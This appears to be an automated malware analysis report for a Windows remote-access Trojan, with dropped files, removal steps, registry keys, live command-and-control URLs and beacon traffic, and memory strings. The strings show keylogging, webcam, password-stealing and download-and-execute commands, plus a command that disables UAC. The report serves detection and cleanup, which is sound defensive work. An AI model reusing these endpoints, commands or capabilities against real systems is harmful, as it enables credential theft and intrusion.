a531e1d6451b30723620c298fdf6698cc:\Documents and Settings\"%CurrentUserName%"\Application Data\Microsoft\winlogon.exe
94a20be0aca341f670175ad7b30cdb70c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\CRYPT.EXE
d57c0b186f317542fe21e13b415afd0ec:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\HIDDEN SIGHT.EXE
f4a9746343bff59289683b61ee2aaea5c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\HSCB.EXE
8681a2f9790d32af1e04ae38bb6718c8c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\OPENGL.EXE
97dd74c87a8c95010e03df713ba89e94c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\TEST.EXE
925037fce4e40da2630be9ba1d0b5168c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\TEST2.EXE
30be59a5ef02c6452e31c5772cf25dccc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\TEST3.EXE
d238aa515b128c52b27742ecfd1ce970c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WINUPDATE.EXE
52e851fba866c2714ad2c4c5cd8cd59bc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WUPDATE.EXE

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    TEST3.EXE:1688
    WUPDATE.EXE:960
    TEST.EXE:640
    TEST2.EXE:1636
    WINUPDATE.EXE:560
    WINUPDATE.EXE:1984
    %original file name%.exe:1504
    OPENGL.EXE:2008
    CRYPT.EXE:1552
    HSCB.EXE:952

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\TEST2.EXE (15801 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\OPENGL.EXE (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CRYPT.EXE (5442 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\HSCB.EXE (7386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WINUPDATE.EXE (186 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WUPDATE.EXE (83 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TEST.EXE (15021 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\winlogon.exe (7547 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\HeciServer.exe (7433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\HIDDEN SIGHT.EXE (7386 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Adobe Flash Player" = "%AppData%\Microsoft\winlogon.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Adobe Reader" = "%AppData%\Microsoft\winlogon.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Microsoft(R) Delayed Launcher" = "%AppData%\Microsoft\HeciServer.exe"

  5. Remove the references to the Trojan by modifying the following registry value(s) (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "%AppData%\Microsoft\winlogon.exe,explorer.exe"

    [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "%AppData%\Microsoft\HeciServer.exe,explorer.exe"

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name: [ ZERO ]
Product Name: | Hidden Sight |
Product Version: 1.0.0.0
Legal Copyright: Copyright (c) [ZERO] 2012
Legal Trademarks: Crypters
Original Filename: _Stealth.exe
Internal Name: _Stealth.exe
File Version: 1.0.0.0
File Description: | Hidden Sight |
Comments: Hidden Sight is a PE protection tool which will help you protect your exe files from decompilation.
Language: Language Neutral

Company Name: [ ZERO ]Product Name: | Hidden Sight |Product Version: 1.0.0.0Legal Copyright: Copyright (c) [ZERO] 2012Legal Trademarks: CryptersOriginal Filename: _Stealth.exeInternal Name: _Stealth.exeFile Version: 1.0.0.0File Description: | Hidden Sight |Comments: Hidden Sight is a PE protection tool which will help you protect your exe files from decompilation.Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text40965243115248004.598816c20c6bf686768b6f134f5bd508171bc
.rdata53248055644558083.38259f979966509a93083729d23cdfd2a6f2d
.data589824107800266241.526492eada62709ff2cb9506fbd72640c857c
.rsrc700416369737236976645.5059997ae30925e33e7ab08099e9b0c471f6

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://tuttyfrutty.hol.es/root/Panel/gate.php31.220.16.4
hxxp://gentle.eu5.org/root/HC/index.php?action=add&a=12&c=XP8&u=www.no-ip.com&l=&p=5.9.106.214
hxxp://gentle.eu5.org/root/HC/index.php?action=add&a=4&c=XP8&u=-&l=Microsoft Windows XP Professional&p=FC62K-HM2DP-GP43D-DJMFR-2DC4G5.9.106.214
joujounette974.ddns.net108.59.13.41

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

POST /root/Panel/gate.php HTTP/1.0

Host: tuttyfrutty.hol.es

Accept: */*

Accept-Encoding: identity, *;q=0

Content-Length: 444

Connection: close

Content-Type: application/octet-stream

Content-Encoding: binary

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

.?..<.=..J......t.7{....`M.PS....&.....\H.;_.ON&`......|....FO....a...1`.<...R3....p....MJ...=.2..cO..Q %...U.CEu. &~.;..=I....D...Ql...E.Sx.t.9..^P....8............V$..0.^8'`..h...!...>....aC(9.?,.3}....pZ' wi.....Wk..&....._.#kF.,.-......G$.k.....$Q.G..Z...s....t.8K.-..a.......w8.j[<..3Y.....eG.qJ..~.y_....#..&...$E@`......Q......c~.....Zv..xl.L..~..

.P.T".Rm.k.cTo.jB7...HZ -..6...!zaS.M.4...a....9)Y.NC;VTE...xT..e6v.#v...z8E.. ].2-.K

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 01 Aug 2014 08:17:39 GMT

Content-Type: text/html

Content-Length: 154

Connection: close

Location: hXXp://redirect.main-hosting.eu/cpu_exceeded.php?id=13&domain=tuttyfrutty.hol.es&master=0

<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>....

GET /root/HC/index.php?action=add&a=12&c=XP8&u=VVV.no-ip.com&l=&p= HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: gentle.eu5.org

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 01 Aug 2014 08:17:38 GMT

Server: Apache

X-Powered-By: PHP/5.4.17

Content-Length: 0

Keep-Alive: timeout=1, max=10000

Connection: Keep-Alive

Content-Type: text/html

HTTP/1.1 200 OK..Date: Fri, 01 Aug 2014 08:17:38 GMT..Server: Apache..X-Powered-By: PHP/5.4.17..Content-Length: 0..Keep-Alive: timeout=1, max=10000..Connection: Keep-Alive..Content-Type: text/html..

POST /root/Panel/gate.php HTTP/1.0

Host: tuttyfrutty.hol.es

Accept: */*

Accept-Encoding: identity, *;q=0

Content-Length: 444

Connection: close

Content-Type: application/octet-stream

Content-Encoding: binary

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

.?..<.=..J......t.7{....`M.PS....&.....\H.;_.ON&`......|....FO....a...1`.<...R3....p....MJ...=.2..cO..Q %...U.CEu. &~.;..=I....D...Ql...E.Sx.t.9..^P....8............V$..0.^8'`..h...!...>....aC(9.?,.3}....pZ' wi.....Wk..&....._.#kF.,.-......G$.k.....$Q.G..Z...s....t.8K.-..a.......w8.j[<..3Y.....eG.qJ..~.y_....#..&...$E@`......Q......c~.....Zv..xl.L..~..

.P.T".Rm.k.cTo.jB7...HZ -..6...!zaS.M.4...a....9)Y.NC;VTE...xT..e6v.#v...z8E.. ].2-.K

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 01 Aug 2014 08:17:34 GMT

Content-Type: text/html

Content-Length: 154

Connection: close

Location: hXXp://redirect.main-hosting.eu/cpu_exceeded.php?id=13&domain=tuttyfrutty.hol.es&master=0

<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>....

POST /root/Panel/gate.php HTTP/1.0

Host: tuttyfrutty.hol.es

Accept: */*

Accept-Encoding: identity, *;q=0

Content-Length: 444

Connection: close

Content-Type: application/octet-stream

Content-Encoding: binary

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

.?..<.=..J......t.7{....`M.PS....&.....\H.;_.ON&`......|....FO....a...1`.<...R3....p....MJ...=.2..cO..Q %...U.CEu. &~.;..=I....D...Ql...E.Sx.t.9..^P....8............V$..0.^8'`..h...!...>....aC(9.?,.3}....pZ' wi.....Wk..&....._.#kF.,.-......G$.k.....$Q.G..Z...s....t.8K.-..a.......w8.j[<..3Y.....eG.qJ..~.y_....#..&...$E@`......Q......c~.....Zv..xl.L..~..

.P.T".Rm.k.cTo.jB7...HZ -..6...!zaS.M.4...a....9)Y.NC;VTE...xT..e6v.#v...z8E.. ].2-.K

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 01 Aug 2014 08:17:44 GMT

Content-Type: text/html

Content-Length: 154

Connection: close

Location: hXXp://redirect.main-hosting.eu/cpu_exceeded.php?id=13&domain=tuttyfrutty.hol.es&master=0

<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>....

GET /root/HC/index.php?action=add&a=4&c=XP8&u=-&l=Microsoft Windows XP Professional&p=FC62K-HM2DP-GP43D-DJMFR-2DC4G HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: gentle.eu5.org

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 01 Aug 2014 08:17:38 GMT

Server: Apache

X-Powered-By: PHP/5.4.17

Content-Length: 0

Keep-Alive: timeout=1, max=10000

Connection: Keep-Alive

Content-Type: text/html

HTTP/1.1 200 OK..Date: Fri, 01 Aug 2014 08:17:38 GMT..Server: Apache..X-Powered-By: PHP/5.4.17..Content-Length: 0..Keep-Alive: timeout=1, max=10000..Connection: Keep-Alive..Content-Type: text/html..

POST /root/Panel/gate.php HTTP/1.0

Host: tuttyfrutty.hol.es

Accept: */*

Accept-Encoding: identity, *;q=0

Content-Length: 444

Connection: close

Content-Type: application/octet-stream

Content-Encoding: binary

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

.?..<.=..J......t.7{....`M.PS....&.....\H.;_.ON&`......|....FO....a...1`.<...R3....p....MJ...=.2..cO..Q %...U.CEu. &~.;..=I....D...Ql...E.Sx.t.9..^P....8............V$..0.^8'`..h...!...>....aC(9.?,.3}....pZ' wi.....Wk..&....._.#kF.,.-......G$.k.....$Q.G..Z...s....t.8K.-..a.......w8.j[<..3Y.....eG.qJ..~.y_....#..&...$E@`......Q......c~.....Zv..xl.L..~..

.P.T".Rm.k.cTo.jB7...HZ -..6...!zaS.M.4...a....9)Y.NC;VTE...xT..e6v.#v...z8E.. ].2-.K

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 01 Aug 2014 08:17:50 GMT

Content-Type: text/html

Content-Length: 154

Connection: close

Location: hXXp://redirect.main-hosting.eu/cpu_exceeded.php?id=13&domain=tuttyfrutty.hol.es&master=0

<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>....

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

svchost.exe_1368:

.text

.text

`.data

`.data

.rsrc

.rsrc

ADVAPI32.dll

ADVAPI32.dll

KERNEL32.dll

KERNEL32.dll

NTDLL.DLL

NTDLL.DLL

RPCRT4.dll

RPCRT4.dll

NETAPI32.dll

NETAPI32.dll

ole32.dll

ole32.dll

ntdll.dll

ntdll.dll

RegCloseKey

RegCloseKey

RegOpenKeyExW

RegOpenKeyExW

GetProcessHeap

GetProcessHeap

NtOpenKey

NtOpenKey

svchost.pdb

svchost.pdb

\PIPE\

\PIPE\

Software\Microsoft\Windows NT\CurrentVersion\Svchost

Software\Microsoft\Windows NT\CurrentVersion\Svchost

\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\

\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\

5.1.2600.5512 (xpsp.080413-2111)

5.1.2600.5512 (xpsp.080413-2111)

svchost.exe

svchost.exe

Windows

Windows

Operating System

Operating System

5.1.2600.5512

5.1.2600.5512

svchost.exe_1368_rwx_00080000_00001000:

KERNEL32.DLL

KERNEL32.DLL

svchost.exe_1368_rwx_001C0000_00001000:

KERNEL32.DLL

KERNEL32.DLL

svchost.exe_1368_rwx_00200000_00001000:

KERNEL32.DLL

KERNEL32.DLL

svchost.exe_1368_rwx_00240000_00001000:

KERNEL32.DLL

KERNEL32.DLL

svchost.exe_1368_rwx_00280000_00001000:

KERNEL32.DLL

KERNEL32.DLL

svchost.exe_1368_rwx_002C0000_00001000:

KERNEL32.DLL

KERNEL32.DLL

svchost.exe_1368_rwx_004E0000_00001000:

advapi32.dll

advapi32.dll

svchost.exe_1368_rwx_00610000_00001000:

RegOpenKeyA

RegOpenKeyA

svchost.exe_1368_rwx_00620000_00001000:

advapi32.dll

advapi32.dll

svchost.exe_1368_rwx_00650000_00001000:

AVICAP32.DLL

AVICAP32.DLL

svchost.exe_1368_rwx_00790000_00001000:

AVICAP32.DLL

AVICAP32.DLL

svchost.exe_1368_rwx_007C0000_00001000:

gdi32.dll

gdi32.dll

svchost.exe_1368_rwx_00800000_00001000:

gdi32.dll

gdi32.dll

svchost.exe_1368_rwx_00830000_00001000:

gdiplus.dll

gdiplus.dll

svchost.exe_1368_rwx_00870000_00001000:

gdiplus.dll

gdiplus.dll

svchost.exe_1368_rwx_008B0000_00001000:

mpr.dll

mpr.dll

svchost.exe_1368_rwx_00E50000_00001000:

mpr.dll

mpr.dll

svchost.exe_1368_rwx_00E80000_00001000:

msacm32.dll

msacm32.dll

svchost.exe_1368_rwx_00FD0000_00001000:

msacm32.dll

msacm32.dll

svchost.exe_1368_rwx_01310000_00001000:

ntdll.dll

ntdll.dll

svchost.exe_1368_rwx_01450000_00001000:

ntdll.dll

ntdll.dll

svchost.exe_1368_rwx_01480000_00001000:

ole32.dll

ole32.dll

svchost.exe_1368_rwx_015C0000_00001000:

ole32.dll

ole32.dll

svchost.exe_1368_rwx_015F0000_00001000:

oleaut32.dll

oleaut32.dll

svchost.exe_1368_rwx_01730000_00001000:

oleaut32.dll

oleaut32.dll

svchost.exe_1368_rwx_01760000_00001000:

powrprof.dll

powrprof.dll

svchost.exe_1368_rwx_018A0000_00001000:

powrprof.dll

powrprof.dll

svchost.exe_1368_rwx_018D0000_00001000:

shell32.dll

shell32.dll

svchost.exe_1368_rwx_01A00000_00001000:

ShellExecuteA

ShellExecuteA

svchost.exe_1368_rwx_01A10000_00001000:

shell32.dll

shell32.dll

svchost.exe_1368_rwx_01A40000_00001000:

user32.dll

user32.dll

svchost.exe_1368_rwx_01B80000_00001000:

user32.dll

user32.dll

svchost.exe_1368_rwx_01BB0000_00001000:

wininet.dll

wininet.dll

svchost.exe_1368_rwx_01CE0000_00001000:

FtpOpenFileA

FtpOpenFileA

svchost.exe_1368_rwx_01CF0000_00001000:

wininet.dll

wininet.dll

svchost.exe_1368_rwx_01D20000_00001000:

winmm.dll

winmm.dll

svchost.exe_1368_rwx_01E60000_00001000:

winmm.dll

winmm.dll

svchost.exe_1368_rwx_01E90000_00001000:

wsock32.dll

wsock32.dll

svchost.exe_1368_rwx_01FE0000_00001000:

wsock32.dll

wsock32.dll

svchost.exe_1368_rwx_10410000_00065000:

`.rsrc

`.rsrc

kernel32.dll

kernel32.dll

Portions Copyright (c) 1999,2003 Avenger by NhT

Portions Copyright (c) 1999,2003 Avenger by NhT

SHFileOperationA

SHFileOperationA

shell32.dll

shell32.dll

URLDownloadToFileA

URLDownloadToFileA

urlmon.dll

urlmon.dll

ShellExecuteA

ShellExecuteA

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

GetWindowsDirectoryA

GetWindowsDirectoryA

SOFTWARE\Microsoft\Windows\CurrentVersion

SOFTWARE\Microsoft\Windows\CurrentVersion

http\shell\open\command

http\shell\open\command

\Internet Explorer\iexplore.exe

\Internet Explorer\iexplore.exe

####@####

####@####

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

Portugal

Portugal

Turkey

Turkey

Windows 3.1

Windows 3.1

Windows 95 (Release 2)

Windows 95 (Release 2)

Windows 95

Windows 95

Windows 98 SE

Windows 98 SE

Windows 98

Windows 98

Windows ME

Windows ME

Windows 7

Windows 7

Windows Vista

Windows Vista

%s %s

%s %s

Windows XP Professional x64

Windows XP Professional x64

Windows XP Home

Windows XP Home

Windows XP Professional

Windows XP Professional

Windows 2000 Professional

Windows 2000 Professional

Windows NT %d.%d

Windows NT %d.%d

Windows 2008

Windows 2008

%s %s Server

%s %s Server

Windows 2003 Server Datacenter

Windows 2003 Server Datacenter

Windows 2003 Server Enterprise

Windows 2003 Server Enterprise

Windows 2003 Server Web Edition

Windows 2003 Server Web Edition

Windows 2003 Server

Windows 2003 Server

Windows Home Server

Windows Home Server

Windows 2003 Server (Release 2)

Windows 2003 Server (Release 2)

Windows 2000 Server Datacenter

Windows 2000 Server Datacenter

Windows 2000 Server Enterprise

Windows 2000 Server Enterprise

Windows 2000 Server Web Edition

Windows 2000 Server Web Edition

Windows 2000 Server

Windows 2000 Server

Windows NT 4.0 Server Datacenter

Windows NT 4.0 Server Datacenter

Windows NT 4.0 Server Enterprise

Windows NT 4.0 Server Enterprise

Windows NT 4.0 Server Web Edition

Windows NT 4.0 Server Web Edition

Windows NT 4.0 Server

Windows NT 4.0 Server

Unknown Platform ID (%d)

Unknown Platform ID (%d)

%d.%d

%d.%d

%s (Build: %d

%s (Build: %d

- Service Pack: %s

- Service Pack: %s

KERNEL32.DLL

KERNEL32.DLL

teste.vbs

teste.vbs

teste.txt

teste.txt

Set objSecurityCenter = GetObject("winmgmts:\\.\root\SecurityCenter")

Set objSecurityCenter = GetObject("winmgmts:\\.\root\SecurityCenter")

Set colFirewall = objSecurityCenter.ExecQuery("Select * From FirewallProduct",,48)

Set colFirewall = objSecurityCenter.ExecQuery("Select * From FirewallProduct",,48)

Set colAntiVirus = objSecurityCenter.ExecQuery("Select * From AntiVirusProduct",,48)

Set colAntiVirus = objSecurityCenter.ExecQuery("Select * From AntiVirusProduct",,48)

Set objFileSystem = CreateObject("Scripting.fileSystemObject")

Set objFileSystem = CreateObject("Scripting.fileSystemObject")

Set objFile = objFileSystem.CreateTextFile("

Set objFile = objFileSystem.CreateTextFile("

Info = Info & "F" & CountFw & ") " & objFirewall.displayName & " v" & objFirewall.versionNumber & Enter

Info = Info & "F" & CountFw & ") " & objFirewall.displayName & " v" & objFirewall.versionNumber & Enter

Info = Info & "A" & CountAV & ") " & objAntiVirus.displayName & " v" & objAntiVirus.versionNumber & Enter

Info = Info & "A" & CountAV & ") " & objAntiVirus.displayName & " v" & objAntiVirus.versionNumber & Enter

objFile.WriteLine(Info)

objFile.WriteLine(Info)

objFile.Close

objFile.Close

cscript.exe

cscript.exe

AVICAP32.dll

AVICAP32.dll

tFtpAccess

tFtpAccess

v1.07.5

v1.07.5

BuildImportTable: can't load library:

BuildImportTable: can't load library:

BuildImportTable: ReallocMemory failed

BuildImportTable: ReallocMemory failed

BuildImportTable: GetProcAddress failed

BuildImportTable: GetProcAddress failed

BTMemoryLoadLibary: BuildImportTable failed

BTMemoryLoadLibary: BuildImportTable failed

BTMemoryGetProcAddress: no export table found

BTMemoryGetProcAddress: no export table found

BTMemoryGetProcAddress: DLL doesn't export anything

BTMemoryGetProcAddress: DLL doesn't export anything

BTMemoryGetProcAddress: exported symbol not found

BTMemoryGetProcAddress: exported symbol not found

SetupApi.dll

SetupApi.dll

SetupDiOpenClassRegKey

SetupDiOpenClassRegKey

SetupDiOpenClassRegKeyExA

SetupDiOpenClassRegKeyExA

SetupDiOpenClassRegKeyExW

SetupDiOpenClassRegKeyExW

SetupDiCreateDeviceInterfaceRegKeyA

SetupDiCreateDeviceInterfaceRegKeyA

SetupDiCreateDeviceInterfaceRegKeyW

SetupDiCreateDeviceInterfaceRegKeyW

SetupDiOpenDeviceInterfaceRegKey

SetupDiOpenDeviceInterfaceRegKey

SetupDiDeleteDeviceInterfaceRegKey

SetupDiDeleteDeviceInterfaceRegKey

SetupDiCreateDevRegKeyA

SetupDiCreateDevRegKeyA

SetupDiCreateDevRegKeyW

SetupDiCreateDevRegKeyW

SetupDiOpenDevRegKey

SetupDiOpenDevRegKey

SetupDiDeleteDevRegKey

SetupDiDeleteDevRegKey

CM_DEVCAP_LOCKSUPPORTED

CM_DEVCAP_LOCKSUPPORTED

CM_DEVCAP_EJECTSUPPORTED

CM_DEVCAP_EJECTSUPPORTED

PDCAP_D0_SUPPORTED

PDCAP_D0_SUPPORTED

PDCAP_D1_SUPPORTED

PDCAP_D1_SUPPORTED

PDCAP_D2_SUPPORTED

PDCAP_D2_SUPPORTED

PDCAP_D3_SUPPORTED

PDCAP_D3_SUPPORTED

PDCAP_WAKE_FROM_D0_SUPPORTED

PDCAP_WAKE_FROM_D0_SUPPORTED

PDCAP_WAKE_FROM_D1_SUPPORTED

PDCAP_WAKE_FROM_D1_SUPPORTED

PDCAP_WAKE_FROM_D2_SUPPORTED

PDCAP_WAKE_FROM_D2_SUPPORTED

PDCAP_WAKE_FROM_D3_SUPPORTED

PDCAP_WAKE_FROM_D3_SUPPORTED

PDCAP_WARM_EJECT_SUPPORTED

PDCAP_WARM_EJECT_SUPPORTED

HKEY_CLASSES_ROOT

HKEY_CLASSES_ROOT

HKEY_CURRENT_CONFIG

HKEY_CURRENT_CONFIG

HKEY_CURRENT_USER

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_USERS

127.0.0.1

127.0.0.1

iphlpapi.dll

iphlpapi.dll

AllocateAndGetTcpExTableFromStack

AllocateAndGetTcpExTableFromStack

AllocateAndGetUdpExTableFromStack

AllocateAndGetUdpExTableFromStack

SetTcpEntry

SetTcpEntry

GetExtendedTcpTable

GetExtendedTcpTable

GetExtendedUdpTable

GetExtendedUdpTable

Mozilla3_5Password

Mozilla3_5Password

GetChromePass

GetChromePass

StartHttpProxy

StartHttpProxy

1.2.3

1.2.3

keyboardkey

keyboardkey

webcaminactive

webcaminactive

webcamgetbuffer

webcamgetbuffer

webcam

webcam

enviarexecnormal

enviarexecnormal

enviarexechidden

enviarexechidden

openweb

openweb

openwebpage

openwebpage

openwebhidden

openwebhidden

downexec

downexec

sendftp

sendftp

keylogger

keylogger

keyloggergetlog

keyloggergetlog

keyloggereraselog

keyloggereraselog

keyloggerativar

keyloggerativar

keyloggerdesativar

keyloggerdesativar

renamekey

renamekey

windowsfechar

windowsfechar

windowsmax

windowsmax

windowsmin

windowsmin

windowsmostrar

windowsmostrar

windowsocultar

windowsocultar

windowsmintodas

windowsmintodas

windowscaption

windowscaption

listarportas

listarportas

listarportasdns

listarportasdns

finalizarprocessoportas

finalizarprocessoportas

webcamsettings

webcamsettings

chatmsg

chatmsg

getpassword

getpassword

updateservidorweb

updateservidorweb

keyloggersearch

keyloggersearch

urlredirect

urlredirect

urlredirecttrue

urlredirecttrue

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

PSAPI.dll

PSAPI.dll

\config\SteamAppData.vdf

\config\SteamAppData.vdf

AutoLoginUser

AutoLoginUser

/ClientRegistry.Blob

/ClientRegistry.Blob

\ClientRegistry.blob

\ClientRegistry.blob

\steam.dll

\steam.dll

%SYS%

%SYS%

ÞSKTOP%

ÞSKTOP%

Uhm%D

Uhm%D

HKEY_PERFORMANCE_DATA

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_DYN_DATA

FirstExecution

FirstExecution

chatmsg|

chatmsg|

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

listarjanelas|windowsfechar|

listarjanelas|windowsfechar|

listarjanelas|windowsmax|

listarjanelas|windowsmax|

listarjanelas|windowsmin|

listarjanelas|windowsmin|

listarjanelas|windowsmostrar|

listarjanelas|windowsmostrar|

listarjanelas|windowsocultar|

listarjanelas|windowsocultar|

listarjanelas|windowsmintodas|

listarjanelas|windowsmintodas|

listarjanelas|windowscaption|

listarjanelas|windowscaption|

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

listarportas|listadeportaspronta|

listarportas|listadeportaspronta|

listarportas|finalizarconexao|

listarportas|finalizarconexao|

listarportas|finalizarprocessoportas|Y|

listarportas|finalizarprocessoportas|Y|

listarportas|finalizarprocessoportas|N|

listarportas|finalizarprocessoportas|N|

registro|renamekey|

registro|renamekey|

keylogger|keylogger|keyloggerativar|

keylogger|keylogger|keyloggerativar|

keylogger|keylogger|keyloggerdesativar|

keylogger|keylogger|keyloggerdesativar|

keylogger|keyloggergetlog|

keylogger|keyloggergetlog|

keylogger|keylogger|keyloggervazio|

keylogger|keylogger|keyloggervazio|

keyloggersearchok|

keyloggersearchok|

webcam|webcaminactive|

webcam|webcaminactive|

webcam|webcamactive|

webcam|webcamactive|

SOFTWARE\Mozilla\Mozilla Firefox

SOFTWARE\Mozilla\Mozilla Firefox

getfirefox

getfirefox

getielogin

getielogin

getiepass

getiepass

getieweb

getieweb

getchrome

getchrome

getpassword|getpasswordlist|

getpassword|getpasswordlist|

getpassword|getpassworderror|

getpassword|getpassworderror|

duac.bat

duac.bat

%windir%\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

%windir%\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

cmd.exe duac.bat

cmd.exe duac.bat

C:\Windows\System32\drivers\etc\hosts

C:\Windows\System32\drivers\etc\hosts

Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\

Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\

Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\

Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\

Software\Microsoft\Windows\CurrentVersion\RunServices\

Software\Microsoft\Windows\CurrentVersion\RunServices\

Software\Microsoft\Windows\CurrentVersion\RunOnce\

Software\Microsoft\Windows\CurrentVersion\RunOnce\

Software\Microsoft\Windows\CurrentVersion\Run\

Software\Microsoft\Windows\CurrentVersion\Run\

temp.vbs

temp.vbs

ntdll.dll

ntdll.dll

log.dat

log.dat

SQLite3.dll

SQLite3.dll

deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly

deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly

inflate 1.2.3 Copyright 1995-2005 Mark Adler

inflate 1.2.3 Copyright 1995-2005 Mark Adler

KWindows

KWindows

RegExport

RegExport

UrlMon

UrlMon

UnitExecutarComandos

UnitExecutarComandos

uftp

uftp

.UnitBytesSize

.UnitBytesSize

UnitListarPortasAtivas

UnitListarPortasAtivas

UnitWebcam

UnitWebcam

UnitKeylogger

UnitKeylogger

WinExec

WinExec

SetNamedPipeHandleState

SetNamedPipeHandleState

GetProcessHeap

GetProcessHeap

CreatePipe

CreatePipe

RegQueryInfoKeyA

RegQueryInfoKeyA

RegOpenKeyExA

RegOpenKeyExA

RegOpenKeyA

RegOpenKeyA

RegEnumKeyExA

RegEnumKeyExA

RegDeleteKeyA

RegDeleteKeyA

RegCreateKeyExA

RegCreateKeyExA

RegCreateKeyA

RegCreateKeyA

RegCloseKey

RegCloseKey

GdiplusShutdown

GdiplusShutdown

keybd_event

keybd_event

MsgWaitForMultipleObjects

